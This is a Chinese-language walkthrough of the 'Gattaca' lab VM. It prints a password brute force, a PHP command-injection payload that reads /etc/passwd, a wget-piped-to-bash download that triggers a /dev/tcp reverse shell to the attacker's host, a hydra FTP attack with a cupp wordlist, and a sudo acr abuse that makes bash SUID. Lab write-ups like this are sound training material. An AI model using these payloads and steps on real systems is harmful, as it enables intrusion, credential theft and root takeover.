# 靶场搭建
下载:Gattaca
Nat,IP: 192.168.1.172
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
21/tcp filtered ftp | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-server-header: Apache/2.4.57 (Debian) | |
|_http-title: Gattaca |
信息过程: http://192.168.1.172/cards.php
密码爆破,找一个合适的字典嘛,不然弱口令跑一万年
一组账号: admin/admin12345
登录进去发现就是一个文件包含,包含一下 cards.php 看看呢
<?php | |
$folder = "/var/www/gattaca/cards"; | |
$files = scandir($folder); | |
$files = array_diff($files, array('.', '..')); | |
foreach ($files as $files) { | |
echo "<li>$files</li>"; | |
} | |
if (isset($_REQUEST['filename'])) { | |
if (!preg_match('/[^A-Za-z0-9. _-]/', $_POST['filename'])) { | |
$output = shell_exec("cat " . $_REQUEST['filename']); | |
echo "$output"; | |
} else { | |
echo "Malicious Request Denied!"; | |
} | |
} | |
?> |
正则逻辑,查看有没有 filename 参数,获取 post 的 filename 参数,仅允许包含 字母数字.-_ 这些字符。执行 cat filename 。
这就有问题了,可以 get 参数上去,POST 为空,然后直接弹 shell,因为存在 RCE
POST /cards.php?filename=;cat+/etc/passwd HTTP/1.1 | |
Host: 192.168.1.172 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 0 | |
Origin: http://192.168.1.172 | |
Authorization: Basic YWRtaW46YWRtaW4xMjM0NQ== | |
Connection: close | |
Referer: http://192.168.1.172/cards.php | |
Upgrade-Insecure-Requests: 1 |
拿到 passwd
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin | |
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin | |
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin | |
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin | |
v.freeman:x:1000:1000::/home/v.freeman:/bin/bash | |
i.cassini:x:1001:1001::/home/i.cassini:/bin/bash | |
ftp:x:102:110:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin |
弹 shell 弹不出来,只能些个脚本传上去执行
┌──(root㉿kali)-[~] | |
└─# cat shell.sh | |
#!/bin/bash | |
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1 | |
┌──(root㉿kali)-[~] | |
└─# python -m http.server 8000 | |
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... | |
192.168.1.172 - - [01/Jun/2024 12:57:43] "GET /shell.sh HTTP/1.1" 200 - |
POST /cards.php?filename=;wget+-O+-+http://192.168.1.129:8000/shell.sh|bash HTTP/1.1 | |
Host: 192.168.1.172 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 0 | |
Origin: http://192.168.1.172 | |
Authorization: Basic YWRtaW46YWRtaW4xMjM0NQ== | |
Connection: close | |
Referer: http://192.168.1.172/cards.php | |
Upgrade-Insecure-Requests: 1 |
拿到了 shell
# 提权
www 目录下有个 ftppolicy.txt
看一下
www-data@gattaca:/var/www$ cat ftppolicy.txt | |
** IMPORTANT ** | |
Remember, when changing your password it must contain these requirements: | |
1. Must be 8 characters or longer | |
2. Must contain numbers | |
3. Must contain special characters | |
Don't waste time with v.freeman and rockyou.txt |
rockyou 字典不能用, v.freeman 也不用爆破了,给了密码规则,那就需要自定义字典了
21 端口被过滤,没办法直接反问,需要通过已经拿到的 shell 搭隧道出来映射到本地
┌──(kali㉿kali)-[~/cupp] | |
└─$ cupp -i | |
___________ | |
cupp.py! # Common | |
\ # User | |
\ ,__, # Passwords | |
\ (oo)____ # Profiler | |
(__) )\ | |
||--|| * [ Muris Kurgas | [email protected] ] | |
[ Mebus | https://github.com/Mebus/] | |
[+] Insert the information about the victim to make a dictionary | |
[+] If you don't know all the info, just hit enter when asked! ;) | |
> First Name: irene | |
> Surname: cassini | |
> Nickname: i.cassini | |
> Birthdate (DDMMYYYY): | |
> Partners) name: | |
> Partners) nickname: | |
> Partners) birthdate (DDMMYYYY): | |
> Child's name: | |
> Child's nickname: | |
> Child's birthdate (DDMMYYYY): | |
> Pet's name: | |
> Company name: gattaca | |
> Do you want to add some key words about the victim? Y/[N]: n | |
> Do you want to add special chars at the end of words? Y/[N]: y | |
> Do you want to add some random numbers at the end of words? Y/[N]:y | |
> Leet mode? (i.e. leet = 1337) Y/[N]: y | |
[+] Now making a dictionary... | |
[+] Sorting list and removing duplicates... | |
[+] Saving dictionary to irene.txt, counting 7964 words. | |
[+] Now load your pistolero with irene.txt and shoot! Good luck! |
┌──(root㉿kali)-[~] | |
└─# hydra -l i.cassini -P irene.txt ftp://127.0.0.1/ -I -t 64 -V | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 23:55:31 | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 7532 login tries (l:1/p:7532), ~118 tries per task | |
[DATA] attacking ftp://127.0.0.1:21/ | |
[21][ftp] host: 127.0.0.1 login: i.cassini password: 1r3n3!$% |
搞到账号密码: i.cassini/1r3n3!$%
www-data@gattaca:/var/www/gattaca$ su i.cassini | |
Password: | |
i.cassini@gattaca:/var/www/gattaca$ sudo -l | |
Matching Defaults entries for i.cassini on gattaca: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
use_pty | |
User i.cassini may run the following commands on gattaca: | |
(ALL : ALL) NOPASSWD: /usr/bin/acr | |
i.cassini@gattaca:/var/www/gattaca$ cd ~ | |
i.cassini@gattaca:~$ touch exploit && chmod +x exploit | |
i.cassini@gattaca:~$ echo "chmod 4777 /bin/bash" > exploit | |
i.cassini@gattaca:~$ sudo /usr/bin/acr -r exploit | |
error: this is not an acr generated configure script. | |
i.cassini@gattaca:~$ bash -p | |
bash-5.2# cat /root/root.txt | |
bd1061ef36aca528a49f69c00f1feb66 |
拿到了 root 的 shell
